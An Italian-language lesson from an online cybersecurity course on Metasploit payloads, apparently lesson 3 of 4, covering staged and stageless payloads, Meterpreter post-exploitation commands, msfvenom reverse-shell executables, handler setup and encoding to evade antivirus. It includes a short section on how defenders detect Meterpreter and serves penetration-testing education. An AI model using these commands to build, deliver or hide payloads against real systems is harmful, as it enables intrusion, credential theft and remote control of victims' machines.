Payload: staged e stageless, Meterpreter
Scegliete il payload appropriato per ogni scenario e utilizzate Meterpreter per il post-exploitation.
Payload: staged e stageless, Meterpreter è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 3 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.
Che cos'è un payload?
Un payload è il codice eseguito sulla destinazione dopo il successo di un exploit. Definisce ciò che l'attaccante ottiene: una shell, l'esecuzione di comandi, l'accesso ai file o un agente completo come Meterpreter.
Payload staged e stageless
I payload Stageless (/) contengono tutto in un unico binario: sono più grandi ma più semplici e, dopo la distribuzione iniziale, non richiedono un callback di rete. I payload Staged (//) inviano prima un piccolo stager, che scarica il secondo stage dall'handler.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsQuando utilizzare ciascun tipo
Utilizzi stageless quando la destinazione non ha accesso a Internet o all'handler dopo lo sfruttamento iniziale: il payload deve essere autonomo. Utilizzi staged quando desidera un payload iniziale più piccolo e dispone di una connessione affidabile all'handler.
Panoramica di Meterpreter
Meterpreter è il payload avanzato di Metasploit: viene eseguito interamente in memoria, utilizza comunicazioni crittografate e fornisce un'API completa con accesso al file system, migrazione dei processi, keylogging, acquisizione di screenshot e pivoting.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runComandi di Meterpreter
Comandi Meterpreter essenziali per il post-sfruttamento: informazioni sul sistema, elenco dei processi, operazioni sui file e rete.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigrazione dei processi
Migri il processo Meterpreter in un processo più stabile o meno sospetto (ad esempio explorer.exe su Windows). In questo modo può anche aumentare i privilegi, se esegue la migrazione verso un processo con privilegi più elevati.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsGenerazione di payload con msfvenom
msfvenom genera file payload autonomi (EXE, ELF, APK, shellcode) da distribuire tramite phishing, dispositivi USB abbandonati intenzionalmente o web shell nei test autorizzati.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler per la ricezione delle shell
Il modulo auxiliary multi/handler riceve le connessioni delle reverse shell. Lo configuri con lo stesso payload, LHOST e LPORT utilizzati in msfvenom prima di distribuire il payload.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobNozioni di base su encoding ed evasione
Gli encoder di msfvenom possono offuscare i payload per eludere il rilevamento di base degli antivirus basato sulle firme. Nota: gli EDR moderni utilizzano il rilevamento comportamentale; gli encoder da soli non sono sufficienti contro le difese avanzate.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exePayload Bind e Reverse
I payload Reverse si connettono dalla destinazione all'attaccante (una modalità più adatta a NAT e firewall). I payload Bind restano in ascolto sulla destinazione e l'attaccante si connette ad essi. Reverse è la modalità preferita nella maggior parte degli scenari.
Rilevamento dei payload da parte dei difensori
I difensori rilevano Meterpreter tramite firme di rete (pattern del traffico C2), scansione della memoria (tracce dell'iniezione riflessiva di DLL) e analisi comportamentale (process hollowing, relazioni padre-figlio insolite).
Verifica rapida
Che cosa distingue un payload staged da uno stageless in Metasploit?
Riepilogo: payload e Meterpreter
Scelga i payload staged per ridurre l'impatto iniziale e quelli stageless per una distribuzione autonoma. Meterpreter è il payload più completo per il post-sfruttamento: viene eseguito in memoria, è crittografato ed estensibile. Utilizzi msfvenom per generare binari autonomi e configuri sempre multi/handler per ricevere i callback.
Impara Cyber Security Academy con un tutor IA — gratis
Scrivi ed esegui vero codice nel tuo browser, ricevi aiuto istantaneo da un tutor IA disponibile 24/7, e riprendi da dove hai lasciato sul web o nell'app.
- Corsi
- 76
- Lezioni
- 303
Domande Frequenti
La lezione «Payload: staged e stageless, Meterpreter» è gratuita?
Sì — il testo completo di «Payload: staged e stageless, Meterpreter» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.
Cosa imparerò in «Payload: staged e stageless, Meterpreter»?
Scegliete il payload appropriato per ogni scenario e utilizzate Meterpreter per il post-exploitation. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cyber Security Academy?
Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 3 di 4.
Quanto tempo richiede la lezione «Payload: staged e stageless, Meterpreter»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?
Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Architettura di Metasploit e msfconsole
- Sfruttare una vulnerabilità nota
- Payload: staged e stageless, Meterpreter
- Post-exploitation: pivoting e persistenza